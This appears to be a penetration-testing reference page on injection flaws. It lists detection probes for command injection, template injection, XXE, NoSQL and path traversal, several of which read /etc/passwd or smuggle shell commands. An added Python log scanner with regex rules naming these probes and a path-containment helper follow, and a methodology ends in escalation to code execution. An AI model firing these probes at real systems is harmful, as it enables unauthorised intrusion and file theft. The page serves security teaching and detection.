# Injection Vulnerabilities
Injection attacks exploit improper input handling to execute unintended commands, queries, or code on the server side.
## Categories
| Technique | Target | Impact |
|---|---|---|
| Command Injection | OS shell | RCE |
| SSTI | Template engines | RCE |
| XXE | XML parsers | File read, SSRF, RCE |
| NoSQL Injection | MongoDB, etc. | Auth bypass, data leak |
| GraphQL | GraphQL APIs | Data leak, DoS |
| API Attacks | REST/API endpoints | Auth bypass, rate limit bypass |
| Path Traversal | File system | Arbitrary file read |
| File Upload | Upload handlers | RCE, XSS |
## Quick Detection

```
# Command Injection
; id
| whoami
$(id)

# SSTI
{{7*7}}
${7*7}
<%= 7*7 %>

# XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

# NoSQL
{"$ne": null}
{"$gt": ""}

# Path Traversal
../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
```
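The same probe strings are what a defender looks for in request logs. The following is an added example, not code from the original page: a heuristic scanner that URL-decodes each query parameter (including double-encoded values like `..%252f`) and flags the probe families listed above, together with a `safe_join` helper showing the containment check that blocks the path traversal payloads. The rule names, the `SAMPLE_LOG` lines and the `/srv/www/files` base directory are all constructed for illustration.

```python
# Added example (not from the original page): flag the probe strings listed
# above in request query parameters, and show a safe path-join that blocks the
# traversal payloads. Rule names, log lines and paths are constructed.
from __future__ import annotations

import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Heuristic rules for the probe payloads shown on this page (hypothetical rule set).
PROBE_PATTERNS = {
    # "; id", "| whoami", "$(id)"
    "command_injection": re.compile(r"[;&|]\s*(id|whoami)\b|\$\([^)]+\)"),
    # "{{7*7}}", "${7*7}", "<%= 7*7 %>"
    "ssti": re.compile(r"\{\{.*?\}\}|\$\{.*?\}|<%=.*?%>"),
    # <!DOCTYPE ... [<!ENTITY ... SYSTEM ...
    "xxe": re.compile(r"<!DOCTYPE[^>]*\[.*?<!ENTITY[^>]*SYSTEM", re.S | re.I),
    # {"$ne": null}, {"$gt": ""}
    "nosql": re.compile(r'"\$(ne|gt|lt|regex|where)"\s*:'),
    # ../../../etc/passwd (encoded forms are normalised before matching)
    "path_traversal": re.compile(r"(\.\./|\.\.\\){2,}"),
}


def normalize(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so single- and double-encoded probes compare alike."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> list[str]:
    """Return the rule names matched by one parameter value (empty if benign)."""
    v = normalize(value)
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(v)]


def scan_request_log(lines: list[str]) -> list[dict]:
    """Parse 'METHOD /path?query' lines and report every flagged parameter."""
    findings = []
    for line in lines:
        method, _, target = line.partition(" ")
        parts = urlsplit(target)
        # parse_qsl performs the first decode; classify() handles deeper layers
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append({"method": method, "path": parts.path,
                                 "param": param, "categories": hits})
    return findings


def safe_join(base_dir: str, user_path: str) -> str | None:
    """Resolve user_path under base_dir; return None if it escapes the base.

    Decodes first, strips leading separators so an absolute path cannot bypass
    the join, then resolves symlinks with realpath before the containment check.
    """
    base = os.path.realpath(base_dir)
    relative = normalize(user_path).lstrip("/\\")
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


# Constructed access-log lines: one benign request, then one per probe family.
SAMPLE_LOG = [
    "GET /search?q=widgets",
    "GET /ping?host=10.0.0.5%3B+id",
    "GET /render?name=%7B%7B7*7%7D%7D",
    "GET /files?path=..%252f..%252f..%252fetc%252fpasswd",
    "POST /login?user=admin&pass=%7B%22%24ne%22%3A+null%7D",
    "POST /import?xml=%3C!DOCTYPE+foo+%5B%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E",
]

if __name__ == "__main__":
    for f in scan_request_log(SAMPLE_LOG):
        print(f"{f['method']} {f['path']} param={f['param']} -> {', '.join(f['categories'])}")
    print(safe_join("/srv/www/files", "reports/q1.txt"))
    print(safe_join("/srv/www/files", "..%2f..%2f..%2fetc%2fpasswd"))
```

The regexes are triage heuristics keyed to the exact payloads on this page; they are useful for spotting scanner traffic in logs, not a substitute for parameterised queries, a disabled external-entity resolver, or the `safe_join`-style containment check, which is the mitigation that actually holds regardless of encoding.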
## Methodology
- Identify input vectors - Parameters, headers, file uploads, JSON bodies
- Determine technology - Framework, language, database
- Test for injection - Use detection payloads
- Confirm vulnerability - Time-based, error-based, or OOB callbacks
- Escalate - File read → SSRF → RCE